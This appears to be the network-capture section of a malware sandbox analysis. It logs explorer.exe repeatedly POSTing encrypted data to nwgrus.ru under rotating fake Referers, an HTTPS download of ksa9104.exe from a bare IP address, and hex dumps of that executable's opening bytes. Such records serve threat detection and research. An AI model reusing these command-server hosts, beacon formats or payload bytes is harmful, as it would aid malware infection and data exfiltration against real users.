                                                                      Sep 25, 2024 16:02:02.523485899 CEST237OUTData Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 55 1e b3 aa
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vuU_MZWIc9,ZS\\#[v:\$DFl^ i+X}"u&+sN(V,VBrSPp>
                                                                      Sep 25, 2024 16:02:04.095367908 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:02:03 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      25192.168.2.549738116.58.10.60801028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Sep 25, 2024 16:02:04.106247902 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://kktprwryymhwgw.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 363
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:02:04.106264114 CEST363OUTData Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 7e 0e a1 a6
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vu~pUowM'V^VfiD}:!fPL([|UF*Ep>M95r^Z2Zg0[P/VtKzKW|/|jO76
                                                                      Sep 25, 2024 16:02:06.504560947 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:02:06 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      26192.168.2.549739116.58.10.60801028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Sep 25, 2024 16:02:06.513477087 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://waytjuqjooe.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 320
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:02:06.513477087 CEST320OUTData Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 78 5b fc a8
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vux[^lBpnR}zzik~BRE-N$Kr{?FCy)c7_"FftZ/l9hf@7VtOeoT9%
                                                                      Sep 25, 2024 16:02:07.770028114 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:02:07 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      27192.168.2.549740116.58.10.60801028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Sep 25, 2024 16:02:07.777985096 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://seyshogepyribe.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 177
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:02:07.777998924 CEST177OUTData Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 64 3c ac ed
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vud<_%TnO"mTvarK8o}RQWe=<DHTXk*kJ0T{Q
                                                                      Sep 25, 2024 16:02:09.265044928 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:02:08 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      28192.168.2.549752116.58.10.60801028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Sep 25, 2024 16:03:19.973284960 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://jjfnbkmpvhxjsu.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 269
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:03:19.973320007 CEST269OUTData Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 47 4a fe a1
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA .[k,vuGJeTT_VdEl2*|q'QRVx[JV5>zre&?/%<6KHP;&Cn<4^bl=4s
                                                                      Sep 25, 2024 16:03:21.252602100 CEST151INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:03:21 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                      Data Ascii: r


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      29192.168.2.549753116.58.10.60801028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Sep 25, 2024 16:03:30.185046911 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://btusdqnvtphf.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 344
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:03:30.185086966 CEST344OUTData Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 66 00 b8 92
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA .[k,vuf]ykV 5b;1<ez!<:B8oQ\/HV_,2ph)9&E&ds;N-BW7B`^vOQ3x
                                                                      Sep 25, 2024 16:03:31.755563974 CEST151INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:03:31 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                      Data Ascii: r


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      30192.168.2.549754116.58.10.60801028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Sep 25, 2024 16:03:43.811299086 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://utinkaubisghnyye.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 154
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:03:43.811331987 CEST154OUTData Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 52 14 f9 e8
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA .[k,vuRE_8T4P${E"~nq0O'})Xda>Y
                                                                      Sep 25, 2024 16:03:45.252703905 CEST151INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:03:44 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                      Data Ascii: r


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      31192.168.2.549756190.98.23.157801028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Sep 25, 2024 16:04:03.031873941 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://jkjogobunqlid.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 114
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:04:03.031912088 CEST114OUTData Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4e 59 ba 9b
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA .[k,vuNY&BMkk;gN
                                                                      Sep 25, 2024 16:04:04.581497908 CEST151INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:04:04 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                      Data Ascii: r


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      32192.168.2.549758190.98.23.157801028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Sep 25, 2024 16:04:25.663769960 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://ohoqxgflpcpf.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 297
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:04:25.663795948 CEST297OUTData Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 28 24 d3 9b
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA .[k,vu($C~cJPuL[`?cgOhNeBZdQWdt{9+RH EKl$Sq(:,94yZFL:ygw?S5x
                                                                      Sep 25, 2024 16:04:26.955331087 CEST151INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:04:26 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                      Data Ascii: r


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      33192.168.2.549760190.98.23.157801028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Sep 25, 2024 16:04:48.750010014 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://rcdwkbgyoixtxr.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 261
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:04:48.750046015 CEST261OUTData Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2e 38 e0 f8
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA .[k,vu.8\%_H[ohH=!;+wT^IR=vX)$+fd_\?KJzEBX/"4rzu[(5F+A:Hi
                                                                      Sep 25, 2024 16:04:50.037108898 CEST151INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:04:49 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                      Data Ascii: r


                                                                      HTTPS Proxied Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.54973123.145.40.1644431028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-09-25 14:01:56 UTC162OUTGET /ksa9104.exe HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Host: 23.145.40.164
                                                                      2024-09-25 14:01:56 UTC327INHTTP/1.1 200 OK
                                                                      Date: Wed, 25 Sep 2024 14:01:56 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Last-Modified: Wed, 25 Sep 2024 14:00:02 GMT
                                                                      ETag: "65e00-622f209d3b9cb"
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 417280
                                                                      Connection: close
                                                                      Content-Type: application/x-msdos-program
                                                                      2024-09-25 14:01:56 UTC7865INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4b b7 d9 41 0f d6 b7 12 0f d6 b7 12 0f d6 b7 12 60 a0 1c 12 17 d6 b7 12 60 a0 29 12 2f d6 b7 12 60 a0 1d 12 73 d6 b7 12 06 ae 24 12 06 d6 b7 12 0f d6 b6 12 9c d6 b7 12 60 a0 18 12 0e d6 b7 12 60 a0 2d 12 0e d6 b7 12 60 a0 2a 12 0e d6 b7 12 52 69 63 68 0f d6 b7 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 4b 74 8f 65 00 00 00
                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$KA``)/`s$``-`*RichPELKte
                                                                      2024-09-25 14:01:56 UTC8000INData Raw: d0 34 66 0f 7e c0 66 0f 54 05 d0 12 41 00 66 0f fa d0 66 0f d3 ca a9 00 08 00 00 74 4c 3d ff 0b 00 00 7c 7d 66 0f f3 ca 3d 32 0c 00 00 7f 0b 66 0f d6 4c 24 04 dd 44 24 04 c3 66 0f 2e ff 7b 24 ba ec 03 00 00 83 ec 10 89 54 24 0c 8b d4 83 c2 14 89 54 24 08 89 54 24 04 89 14 24 e8 6f 10 00 00 83 c4 10 dd 44 24 04 c3 f3 0f 7e 44 24 04 66 0f f3 ca 66 0f 28 d8 66 0f c2 c1 06 3d ff 03 00 00 7c 25 3d 32 04 00 00 7f b0 66 0f 54 05 a0 12 41 00 f2 0f 58 c8 66 0f d6 4c 24 04 dd 44 24 04 c3 dd 05 e0 12 41 00 c3 66 0f c2 1d c0 12 41 00 06 66 0f 54 1d a0 12 41 00 66 0f d6 5c 24 04 dd 44 24 04 c3 8b ff 55 8b ec 83 ec 10 a1 58 10 44 00 33 c5 89 45 fc 53 56 8b 75 0c f6 46 0c 40 57 0f 85 36 01 00 00 56 e8 ae 1a 00 00 59 bb 18 10 44 00 83 f8 ff 74 2e 56 e8 9d 1a 00 00 59 83
                                                                      Data Ascii: 4f~fTAfftL=|}f=2fL$D$f.{$T$T$T$$oD$~D$ff(f=|%=2fTAXfL$D$AfAfTAf\$D$UXD3ESVuF@W6VYDt.VY
                                                                      2024-09-25 14:01:56 UTC8000INData Raw: 0d 58 5d c3 8b 04 cd e4 12 44 00 5d c3 05 44 ff ff ff 6a 0e 59 3b c8 1b c0 23 c1 83 c0 08 5d c3 e8 7a 24 00 00 85 c0 75 06 b8 48 14 44 00 c3 83 c0 08 c3 e8 67 24 00 00 85 c0 75 06 b8 4c 14 44 00 c3 83 c0 0c c3 8b ff 55 8b ec 56 e8 e2 ff ff ff 8b 4d 08 51 89 08 e8 82 ff ff ff 59 8b f0 e8 bc ff ff ff 89 30 5e 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 68 d0 4a 40 00 64 ff 35 00 00 00 00 8b 44 24 10 89 6c 24 10 8d 6c 24 10 2b e0 53 56 57 a1 58 10 44 00 31 45 fc 33 c5 50 89 65 e8 ff 75 f8 8b 45 fc c7 45 fc fe ff ff ff 89 45 f8 8d 45 f0 64 a3 00 00 00 00 c3 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5f 5e 5b 8b e5 5d 51 c3 cc cc cc cc cc cc cc 8b ff 55 8b ec 83 ec 18 53 8b 5d 0c 56 8b 73 08 33 35 58 10 44 00 57 8b 06 c6 45 ff 00 c7 45 f4 01 00 00 00 8d 7b 10 83
                                                                      Data Ascii: X]D]DjY;#]z$uHDg$uLDUVMQY0^]hJ@d5D$l$l$+SVWXD1E3PeuEEEEdMdY__^[]QUS]Vs35XDWEE{
                                                                      2024-09-25 14:01:56 UTC8000INData Raw: 3d 8f 00 00 c0 75 09 c7 46 64 86 00 00 00 eb 2e 3d 92 00 00 c0 75 09 c7 46 64 8a 00 00 00 eb 1e 3d b5 02 00 c0 75 09 c7 46 64 8d 00 00 00 eb 0e 3d b4 02 00 c0 75 07 c7 46 64 8e 00 00 00 ff 76 64 6a 08 ff d2 59 89 7e 64 eb 07 83 60 08 00 51 ff d2 59 89 5e 60 5b 83 c8 ff 5f 5e 5d c3 a1 08 c2 45 02 33 d2 85 c0 75 05 b8 a8 21 41 00 0f b7 08 83 f9 20 77 09 66 85 c9 74 28 85 d2 74 1c 83 f9 22 75 09 33 c9 85 d2 0f 94 c1 8b d1 83 c0 02 eb dc 66 83 f9 20 77 0b 83 c0 02 0f b7 08 66 85 c9 75 ef c3 8b ff 56 8b 35 e4 6d 44 00 57 33 ff 85 f6 75 1a 83 c8 ff e9 9d 00 00 00 66 83 f8 3d 74 01 47 56 e8 47 32 00 00 59 8d 74 46 02 0f b7 06 66 85 c0 75 e6 53 6a 04 47 57 e8 d8 e8 ff ff 8b d8 59 59 89 1d 10 6e 44 00 85 db 75 05 83 c8 ff eb 65 8b 35 e4 6d 44 00 eb 35 56 e8 0f 32
                                                                      Data Ascii: =uFd.=uFd=uFd=uFdvdjY~d`QY^`[_^]E3u!A wft(t"u3f wfuV5mDW3uf=tGVG2YtFfuSjGWYYnDue5mD5V2
